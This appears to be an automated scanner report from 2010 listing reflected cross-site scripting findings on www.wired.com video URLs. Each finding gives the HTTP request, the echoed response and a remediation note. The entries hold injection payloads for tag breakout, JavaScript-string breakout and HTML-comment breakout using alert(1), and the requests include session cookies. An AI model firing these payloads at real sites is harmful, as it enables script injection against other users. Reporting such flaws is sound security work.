HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29400 Vary: Accept-Encoding Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:57:04 GMT Date: Mon, 22 Nov 2010 00:52:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video4ee46"><a>33fa741b98d ss_calibrate-the-blues-away c_4569448001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84bfb"><a>7582fbe354d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/calibrate-the-blues-away84bfb"><a>7582fbe354d/4569448001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:21 GMT Date: Mon, 22 Nov 2010 00:53:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_calibrate-the-blues-away84bfb"><a>7582fbe354d c_4569448001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37678"-alert(1)-"f1e2422602e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/calibrate-the-blues-away37678"-alert(1)-"f1e2422602e/4569448001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:17 GMT Date: Mon, 22 Nov 2010 00:54:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b20eb"><a>219a2b9005f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/calibrate-the-blues-away/4569448001b20eb"><a>219a2b9005f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:59:29 GMT Date: Mon, 22 Nov 2010 00:54:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_calibrate-the-blues-away c_4569448001b20eb"><a>219a2b9005f"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bba80"-alert(1)-"91f95a021a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/calibrate-the-blues-away/4569448001bba80"-alert(1)-"91f95a021a9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:59:59 GMT Date: Mon, 22 Nov 2010 00:55:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a10f"><a>9f9a6b9c5f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video5a10f"><a>9f9a6b9c5f4/culture HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29255 Vary: Accept-Encoding Cache-Control: max-age=290 Expires: Mon, 22 Nov 2010 00:52:16 GMT Date: Mon, 22 Nov 2010 00:47:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video5a10f"><a>9f9a6b9c5f4 ss_culture"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d97c"><a>59487338fe7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/culture7d97c"><a>59487338fe7 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:52 GMT Date: Mon, 22 Nov 2010 00:48:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_culture7d97c"><a>59487338fe7"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fd0d"-alert(1)-"6f7deddbb2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/culture2fd0d"-alert(1)-"6f7deddbb2f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:54:31 GMT Date: Mon, 22 Nov 2010 00:49:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca37"><a>22302db7157 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video5ca37"><a>22302db7157/events HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29340 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:14 GMT Date: Mon, 22 Nov 2010 00:47:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video5ca37"><a>22302db7157 ss_events"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8d7"><a>6d7a5676676 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/events9e8d7"><a>6d7a5676676 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:53:33 GMT Date: Mon, 22 Nov 2010 00:48:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_events9e8d7"><a>6d7a5676676"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb819"-alert(1)-"a2a012537a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/eventseb819"-alert(1)-"a2a012537a3 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:51 GMT Date: Mon, 22 Nov 2010 00:49:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106712
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49043"><a>f9aca00d89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video49043"><a>f9aca00d89/gadgets HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29344 Vary: Accept-Encoding Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:52:25 GMT Date: Mon, 22 Nov 2010 00:47:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video49043"><a>f9aca00d89 ss_gadgets"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c2f0"-alert(1)-"7cdcaacc317 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/gadgets9c2f0"-alert(1)-"7cdcaacc317 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=295 Expires: Mon, 22 Nov 2010 00:55:09 GMT Date: Mon, 22 Nov 2010 00:50:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e9eb"><a>48a2c0c35be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/gadgets4e9eb"><a>48a2c0c35be HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:14 GMT Date: Mon, 22 Nov 2010 00:49:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_gadgets4e9eb"><a>48a2c0c35be"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c542"><a>37dbceb866c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8c542"><a>37dbceb866c/gaming HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29397 Vary: Accept-Encoding Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:52:44 GMT Date: Mon, 22 Nov 2010 00:47:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8c542"><a>37dbceb866c ss_gaming"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4bad"><a>b536094fcc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/gamingf4bad"><a>b536094fcc3 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:13 GMT Date: Mon, 22 Nov 2010 00:49:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_gamingf4bad"><a>b536094fcc3"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de480"-alert(1)-"9db9e95ab77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/gamingde480"-alert(1)-"9db9e95ab77 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:17 GMT Date: Mon, 22 Nov 2010 00:50:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload cecad--><script>alert(1)</script>d8815df45f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videocecad--><script>alert(1)</script>d8815df45f9/harry-potter-and-the-halfblood-prince/14545305001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29462 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:02 GMT Date: Mon, 22 Nov 2010 00:54:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videocecad--><script>alert(1)</script>d8815df45f9/harry-potter-and-the-halfblood-prince/14545305001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1b1"><a>72a1202a501 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
